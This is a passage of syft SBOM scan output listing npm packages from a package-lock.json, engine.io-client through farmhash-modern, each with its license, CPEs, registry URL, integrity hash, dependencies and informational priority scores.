1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 765ac1332452cd05 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: engine.io-client 6.6.4' title: engine.io-client 6.6.4 description: 'Package discovered: engine.io-client 6.6.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 930ef4784cebfb4a name: engine.io-client version: 6.6.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:socket:engine.io-client:6.6.4:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/engine.io-client@6.6.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/engine.io-client/-/engine.io-client-6.6.4.tgz integrity: sha512-+kjUJnZGwzewFDw951CDWcwj35vMNf2fcj7xQWOctq1F2i1jkDdVvdFG9kM/BEChymCH36KgjnW0NsL58JYRxw== dependencies: '@socket.io/component-emitter': ~3.1.0 debug: ~4.4.1 engine.io-parser: ~5.2.1 ws: ~8.18.3 xmlhttprequest-ssl: ~2.1.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b2a7fb31422c2427 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: engine.io-parser 5.2.3' title: engine.io-parser 5.2.3 description: 'Package discovered: engine.io-parser 5.2.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: b307d9bc2f957b2d name: engine.io-parser version: 5.2.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:engine.io-parser:engine.io-parser:5.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:engine.io-parser:engine.io_parser:5.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:engine.io_parser:engine.io-parser:5.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:engine.io_parser:engine.io_parser:5.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:engine.io:engine.io-parser:5.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:engine.io:engine.io_parser:5.2.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/engine.io-parser@5.2.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/engine.io-parser/-/engine.io-parser-5.2.3.tgz integrity: sha512-HqD3yTBfnBxIrbnM1DoD6Pcq8NECnh8d4As1Qgh0z5Gg3jRRIqijury0CL3ghu/edArpUYiYqQiDUQBIs4np3Q== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 6de5b5b314bb1d48 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: entities 4.5.0' title: entities 4.5.0 description: 'Package discovered: entities 4.5.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 3c365deec0186b44 name: entities version: 4.5.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: BSD-2-Clause spdxExpression: BSD-2-Clause type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:entities:entities:4.5.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/entities@4.5.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/entities/-/entities-4.5.0.tgz integrity: sha512-V0hjH4dGPh9Ao5p0MoRY6BVqtwCjhz6vI5LT8AJ55H+4g9/4vbHx1I54fS0XuclLhDHArPQCiMjDxjaL8fPxhw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 9ebfe3f940205a55 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: es-define-property 1.0.1' title: es-define-property 1.0.1 description: 'Package discovered: es-define-property 1.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 198a07fe3b41a7bb name: es-define-property version: 1.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:es-define-property:es-define-property:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es-define-property:es_define_property:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es_define_property:es-define-property:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es_define_property:es_define_property:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es-define:es-define-property:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es-define:es_define_property:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es_define:es-define-property:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es_define:es_define_property:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es:es-define-property:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es:es_define_property:1.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/es-define-property@1.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz integrity: sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ce987dda52f0c354 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: es-errors 1.3.0' title: es-errors 1.3.0 description: 'Package discovered: es-errors 1.3.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 524e10cb2d7467ea name: es-errors version: 1.3.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:es-errors:es-errors:1.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es-errors:es_errors:1.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es_errors:es-errors:1.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es_errors:es_errors:1.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es:es-errors:1.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es:es_errors:1.3.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/es-errors@1.3.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz integrity: sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 8e3c7c80273d6fd7 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: es-object-atoms 1.1.1' title: es-object-atoms 1.1.1 description: 'Package discovered: es-object-atoms 1.1.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: fa7ef7424a021d69 name: es-object-atoms version: 1.1.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:es-object-atoms:es-object-atoms:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es-object-atoms:es_object_atoms:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es_object_atoms:es-object-atoms:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es_object_atoms:es_object_atoms:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es-object:es-object-atoms:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es-object:es_object_atoms:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es_object:es-object-atoms:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es_object:es_object_atoms:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es:es-object-atoms:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es:es_object_atoms:1.1.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/es-object-atoms@1.1.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz integrity: sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA== dependencies: es-errors: ^1.3.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: cdf746578205af98 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: es-set-tostringtag 2.1.0' title: es-set-tostringtag 2.1.0 description: 'Package discovered: es-set-tostringtag 2.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 8f498e19379b53ea name: es-set-tostringtag version: 2.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:es-set-tostringtag:es-set-tostringtag:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es-set-tostringtag:es_set_tostringtag:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es_set_tostringtag:es-set-tostringtag:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es_set_tostringtag:es_set_tostringtag:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es-set:es-set-tostringtag:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es-set:es_set_tostringtag:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es_set:es-set-tostringtag:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es_set:es_set_tostringtag:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es:es-set-tostringtag:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:es:es_set_tostringtag:2.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/es-set-tostringtag@2.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz integrity: sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA== dependencies: es-errors: ^1.3.0 get-intrinsic: ^1.2.6 has-tostringtag: ^1.0.2 hasown: ^2.0.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 3d860225864c56d0 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: escalade 3.2.0' title: escalade 3.2.0 description: 'Package discovered: escalade 3.2.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 2a58ccd5fc44a7b2 name: escalade version: 3.2.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:escalade:escalade:3.2.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/escalade@3.2.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz integrity: sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 2f35769c64d37fb5 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: escape-html 1.0.3' title: escape-html 1.0.3 description: 'Package discovered: escape-html 1.0.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 94fc6050cdb348bc name: escape-html version: 1.0.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:escape-html:escape-html:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:escape-html:escape_html:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:escape_html:escape-html:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:escape_html:escape_html:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:escape:escape-html:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:escape:escape_html:1.0.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/escape-html@1.0.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/escape-html/-/escape-html-1.0.3.tgz integrity: sha512-NiSupZ4OeuGwr68lGIeym/ksIZMJodUGOSCZ/FSnTxcrekbvqrgdUxlJOMpijaKZVjAJrWrGs/6Jy8OMuyj9ow== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b31fcb4e8c7ac0d8 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: etag 1.8.1' title: etag 1.8.1 description: 'Package discovered: etag 1.8.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 4ddb33d9fc7b6ece name: etag version: 1.8.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:etag:etag:1.8.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/etag@1.8.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/etag/-/etag-1.8.1.tgz integrity: sha512-aIL5Fx7mawVa300al2BnEE4iNvo1qETxLrPI/o05L7z6go7fCw1J6EQmbK4FmJ2AS7kgVF/KEZWufBfdClMcPg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 643445c96492a454 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: event-target-shim 5.0.1' title: event-target-shim 5.0.1 description: 'Package discovered: event-target-shim 5.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 419bcd6d1f4e7103 name: event-target-shim version: 5.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:event-target-shim:event-target-shim:5.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:event-target-shim:event_target_shim:5.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:event_target_shim:event-target-shim:5.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:event_target_shim:event_target_shim:5.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:event-target:event-target-shim:5.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:event-target:event_target_shim:5.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:event_target:event-target-shim:5.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:event_target:event_target_shim:5.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:event:event-target-shim:5.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:event:event_target_shim:5.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/event-target-shim@5.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/event-target-shim/-/event-target-shim-5.0.1.tgz integrity: sha512-i/2XbnSz/uxRCU6+NdVJgKWDTM427+MqYbkQzD321DuCQJUqOuJKIA0IM2+W2xtYHdKOmZ4dR6fExsd4SXL+WQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: df7be298e5b5835f ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: eventemitter3 4.0.7' title: eventemitter3 4.0.7 description: 'Package discovered: eventemitter3 4.0.7' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 2bf11b6ac833063c name: eventemitter3 version: 4.0.7 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:eventemitter3:eventemitter3:4.0.7:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/eventemitter3@4.0.7 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/eventemitter3/-/eventemitter3-4.0.7.tgz integrity: sha512-8guHBZCwKnFhYdHr2ysuRWErTwhoN2X8XELRlrRwpmfeY2jjuUN4taQMsULKUVo1K4DvZl+0pgfyoysHxvmvEw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 8f3c29afa2938d65 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: events 3.3.0' title: events 3.3.0 description: 'Package discovered: events 3.3.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: bca3d6fcf9ecc55d name: events version: 3.3.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:events:events:3.3.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/events@3.3.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/events/-/events-3.3.0.tgz integrity: sha512-mQw+2fkQbALzQ7V0MY0IqdnXNOeTtP4r0lN9z7AAawCXgqea7bDii20AYrIBrFd/Hx0M2Ocz6S111CaFkUcb0Q== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 42a06b319afe7e6e ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: express 4.22.1' title: express 4.22.1 description: 'Package discovered: express 4.22.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 7bcabe4027921ced name: express version: 4.22.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:openjsf:express:4.22.1:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/express@4.22.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/express/-/express-4.22.1.tgz integrity: sha512-F2X8g9P1X7uCPZMA3MVf9wcTqlyNp7IhH5qPCI0izhaOIYXaW9L535tGA3qmjRzpH+bZczqq7hVKxTR4NWnu+g== dependencies: accepts: ~1.3.8 array-flatten: 1.1.1 body-parser: ~1.20.3 content-disposition: ~0.5.4 content-type: ~1.0.4 cookie: ~0.7.1 cookie-signature: ~1.0.6 debug: 2.6.9 depd: 2.0.0 encodeurl: ~2.0.0 escape-html: ~1.0.3 etag: ~1.8.1 finalhandler: ~1.3.1 fresh: ~0.5.2 http-errors: ~2.0.0 merge-descriptors: 1.0.3 methods: ~1.1.2 on-finished: ~2.4.1 parseurl: ~1.3.3 path-to-regexp: ~0.1.12 proxy-addr: ~2.0.7 qs: ~6.14.0 range-parser: ~1.2.1 safe-buffer: 5.2.1 send: ~0.19.0 serve-static: ~1.16.2 setprototypeof: 1.2.0 statuses: ~2.0.1 type-is: ~1.6.18 utils-merge: 1.0.1 vary: ~1.1.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ba97090edfd08e19 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: express-rate-limit 8.5.1' title: express-rate-limit 8.5.1 description: 'Package discovered: express-rate-limit 8.5.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 41f99f3613a4245b name: express-rate-limit version: 8.5.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:express-rate-limit:express-rate-limit:8.5.1:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/express-rate-limit@8.5.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/express-rate-limit/-/express-rate-limit-8.5.1.tgz integrity: sha512-5O6KYmyJEpuPJV5hNTXKbAHWRqrzyu+OI3vUnSd2kXFubIVpG7ezpgxQy76Zo5GQZtrQBg86hF+CM/NX+cioiQ== dependencies: ip-address: ^10.2.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f780fc7a8f12c92d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: extend 3.0.2' title: extend 3.0.2 description: 'Package discovered: extend 3.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: c7f94791a09e5a4e name: extend version: 3.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:extend_project:extend:3.0.2:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/extend@3.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/extend/-/extend-3.0.2.tgz integrity: sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 9507c5e5a8d55fc3 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: farmhash-modern 1.1.0' title: farmhash-modern 1.1.0 description: 'Package discovered: farmhash-modern 1.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 2efb607597053214 name: farmhash-modern version: 1.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: 